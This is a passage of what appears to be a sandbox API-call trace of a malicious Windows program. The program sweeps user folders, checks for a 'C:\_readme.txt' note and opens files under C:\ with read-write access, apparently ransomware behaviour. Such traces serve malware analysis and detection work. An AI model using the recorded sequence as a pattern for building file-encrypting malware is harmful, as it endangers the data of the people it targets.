HALPmcxz\\Favorites\\") returned="Favorites\\" [0173.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.914] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.914] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.914] PathFindFileNameW (pszPath="") returned="" [0173.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1d005180, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d005180, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.914] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.915] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0173.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0173.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.915] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.915] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.915] PathFindFileNameW (pszPath="") returned="" [0173.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1d0775a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d0775a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.915] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.915] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\") returned="D99YKJDL-0LajD\\" [0173.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0173.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.916] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.916] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.916] PathFindFileNameW (pszPath="") returned="" [0173.916] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D99YKJDL-0LajD\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0x1d0c3860, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d0c3860, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.916] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.916] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\") returned="DENcIRfHVVVix5\\" [0173.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0173.916] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.916] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.916] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.916] PathFindFileNameW (pszPath="") returned="" [0173.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DENcIRfHVVVix5\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d0ec80, ftCreationTime.dwHighDateTime=0x1d5df00, ftLastAccessTime.dwLowDateTime=0x1d181f40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d181f40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.917] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.917] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.917] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HCQjXtcJ8s9B2R_\\") returned="HCQjXtcJ8s9B2R_\\" [0173.917] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0173.917] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.917] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.917] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.917] PathFindFileNameW (pszPath="") returned="" [0173.917] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HCQjXtcJ8s9B2R_\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96272d10, ftCreationTime.dwHighDateTime=0x1d5e06b, ftLastAccessTime.dwLowDateTime=0x91faa8c0, ftLastAccessTime.dwHighDateTime=0x1d5db39, ftLastWriteTime.dwLowDateTime=0x91faa8c0, ftLastWriteTime.dwHighDateTime=0x1d5db39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.917] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.918] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.918] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\") returned="lf_1AfflQryz8itj s8w\\" [0173.918] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0173.918] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.918] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.918] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.918] PathFindFileNameW (pszPath="") returned="" [0173.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lf_1AfflQryz8itj s8w\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd480f3a0, ftCreationTime.dwHighDateTime=0x1d5dff5, ftLastAccessTime.dwLowDateTime=0x1d1f4360, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d1f4360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.918] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.918] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.918] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\") returned="LV2X09A0oM561\\" [0173.918] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0173.918] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.919] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.919] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.919] PathFindFileNameW (pszPath="") returned="" [0173.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\LV2X09A0oM561\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc64fd80, ftCreationTime.dwHighDateTime=0x1d5de29, ftLastAccessTime.dwLowDateTime=0x1d2b2a40, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d2b2a40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.919] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.919] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.919] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\") returned="612n\\" [0173.919] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0173.919] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.919] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.919] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.919] PathFindFileNameW (pszPath="") returned="" [0173.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\612n\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2555e30, ftCreationTime.dwHighDateTime=0x1d5e5ba, ftLastAccessTime.dwLowDateTime=0x1d2d8ba0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d2d8ba0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.920] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.920] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.920] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\") returned="js4wnFUoxs42X9Y0mylB\\" [0173.920] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0173.920] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.920] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.920] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.920] PathFindFileNameW (pszPath="") returned="" [0173.920] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc56cc5c0, ftCreationTime.dwHighDateTime=0x1d5e6ca, ftLastAccessTime.dwLowDateTime=0x1d397280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d397280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.920] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.920] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.921] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\") returned="ynvUi8OA0E 4g2YjdS\\" [0173.921] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0173.921] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.921] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.921] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.921] PathFindFileNameW (pszPath="") returned="" [0173.921] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ynvUi8OA0E 4g2YjdS\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37389b0, ftCreationTime.dwHighDateTime=0x1d5e1c8, ftLastAccessTime.dwLowDateTime=0x1d4a1c20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d4a1c20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.921] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.921] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.921] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\") returned="ZyOX_xDVWOQqjcupRL\\" [0173.921] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0173.921] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.921] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.922] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.922] PathFindFileNameW (pszPath="") returned="" [0173.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZyOX_xDVWOQqjcupRL\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f4d5af0, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0x1d514040, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d514040, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.922] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.922] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.922] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\") returned="gOI6FhRK7 r-pcVYvKd\\" [0173.922] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0173.922] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.922] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.922] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.922] PathFindFileNameW (pszPath="") returned="" [0173.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a3699e0, ftCreationTime.dwHighDateTime=0x1d5dc09, ftLastAccessTime.dwLowDateTime=0x1d586460, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d586460, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.923] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.923] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.923] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\") returned="V4xTSO7L1q6Ip\\" [0173.923] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0173.923] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.923] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.923] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.923] PathFindFileNameW (pszPath="") returned="" [0173.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fa9f050, ftCreationTime.dwHighDateTime=0x1d5e17a, ftLastAccessTime.dwLowDateTime=0x1d5d2720, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d5d2720, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.924] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.924] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.924] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.924] PathFindFileNameW (pszPath="") returned="" [0173.924] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.925] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.925] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.925] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x3aa2818 [0173.925] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.925] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0173.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.925] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3577340 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x3a59880 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.926] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e3f49c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3f49c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x35773c0 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a028 | out: hHeap=0x2c0000) returned 1 [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.926] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.926] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.926] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.926] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0173.926] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0173.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59dd0 | out: hHeap=0x2c0000) returned 1 [0173.926] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x1e41ab20, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e41ab20, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 